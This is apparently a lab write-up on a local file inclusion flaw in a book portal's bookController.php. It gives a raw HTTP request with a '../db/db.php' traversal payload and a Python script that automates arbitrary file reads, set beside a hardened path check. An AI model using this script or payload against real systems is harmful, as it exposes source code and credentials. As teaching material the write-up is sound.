Exploiting LFI
Upon intercepting the requests with Burp Suite, we see that the website sends an interesting request field named method. Changing the method field from 0 to 1 throws an error message about a missing book field.
Exploit Code
Using Burp Suite, we can control the book field and, combined with the paths found in the ffuf results, perform LFI to leak the source code of the book portal as well as the admin portal. Here, we read the content of the database config, db.php. The request below is the one used; note that the Content-Length of 42 matches the body, and the session cookies (PHPSESSID and the JWT in token) are required for the endpoint to process the request.
POST /includes/bookController.php HTTP/1.1
Host: 10.10.10.228
Content-Length: 42
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.10.10.228
Referer: http://10.10.10.228/php/books.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=test1e9549a0bf4b172e168a9ca5cbaa6fdb; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoidGVzdCJ9fQ.wO1HzPNOz55oU02jJT2wXL7Mvi0JNSB353p6Mgk3o7Y
Connection: close

title=&author=a&book=../db/db.php&method=1
We can thus proceed to read the other source files found during enumeration to see if anything important is revealed.
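To make the file reads repeatable instead of resending one request at a time in Burp, the following Python script is an added example (not part of the original writeup) that builds the same POST body, fetches arbitrary paths through the book field, and, beside it, contrasts the naive server-side path resolution this LFI implies with a hardened allow-listed version. The web root, the includes and books directories, the assumption that bookController.php opens the book value relative to its own directory, and the session cookies (copied from the captured request) are all assumptions; the application's real code is not on the page.

```python
#!/usr/bin/env python3
"""Added example, not code from the original writeup.

Automates the LFI in the `book` field of bookController.php and contrasts
the vulnerable path handling it implies with a hardened allow-listed version.
"""
import http.client
import posixpath
import sys
from urllib.parse import urlencode

TARGET = "10.10.10.228"
ENDPOINT = "/includes/bookController.php"

# Cookies copied from the captured request; a real run needs a live session.
SESSION = {
    "PHPSESSID": "test1e9549a0bf4b172e168a9ca5cbaa6fdb",
    "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
             "eyJkYXRhIjp7InVzZXJuYW1lIjoidGVzdCJ9fQ."
             "wO1HzPNOz55oU02jJT2wXL7Mvi0JNSB353p6Mgk3o7Y",
}

# ASSUMED server layout for the resolution demo (the real code is not on the page):
# bookController.php sits in /includes and opens the `book` value relative to
# its own directory, which is why ../db/db.php lands on /db/db.php.
INCLUDES_DIR = "/var/www/html/includes"
BOOKS_DIR = "/var/www/html/books"   # assumed intended location of book files


def lfi_payload(path):
    """Form body for method=1 with `book` pointing at an arbitrary path.

    urlencode escapes "/" as %2F; PHP decodes it identically to the raw
    "../db/db.php" shown in the Burp request.
    """
    return urlencode({"title": "", "author": "a", "book": path, "method": 1})


def vulnerable_resolve(book):
    """What a naive `open(__DIR__ . '/' . $book)`-style resolution yields."""
    return posixpath.normpath(posixpath.join(INCLUDES_DIR, book))


def hardened_resolve(book):
    """Allow-list version: the resolved path must stay under BOOKS_DIR."""
    candidate = posixpath.normpath(posixpath.join(BOOKS_DIR, book))
    # posixpath.join discards the base when `book` is absolute, and normpath
    # collapses ../ segments, so both escape routes end up outside the prefix.
    if not candidate.startswith(BOOKS_DIR + "/"):
        raise ValueError(f"rejected path traversal attempt: {book!r}")
    # On a real filesystem also apply os.path.realpath() before the check so
    # symlinks inside BOOKS_DIR cannot point back out of it.
    return candidate


def is_safe_book(book):
    """True if hardened_resolve would accept `book`, False if it rejects it."""
    try:
        hardened_resolve(book)
        return True
    except ValueError:
        return False


def fetch_file(path, host=TARGET, cookies=SESSION, timeout=10):
    """Send the LFI request and return (status, body). Network call; needs the live box."""
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Cookie": "; ".join(f"{k}={v}" for k, v in cookies.items()),
    }
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    try:
        conn.request("POST", ENDPOINT, body=lfi_payload(path), headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


if __name__ == "__main__":
    # Usage: python3 lfi.py ../db/db.php ../admin/index.php
    for target_path in sys.argv[1:] or ["../db/db.php"]:
        print(f"== {target_path} -> {vulnerable_resolve(target_path)}")
        status, body = fetch_file(target_path)
        print(f"[{status}]\n{body}")
```

The hardened resolver is what the fix looks like on the application side: join the user-supplied name onto the intended directory, normalise it, and refuse anything whose canonical form is not under that directory. Checking for the substring ".." instead is not enough, since an absolute path such as /etc/passwd contains no dots at all and posixpath.join (like PHP's string concatenation followed by fopen) happily accepts it.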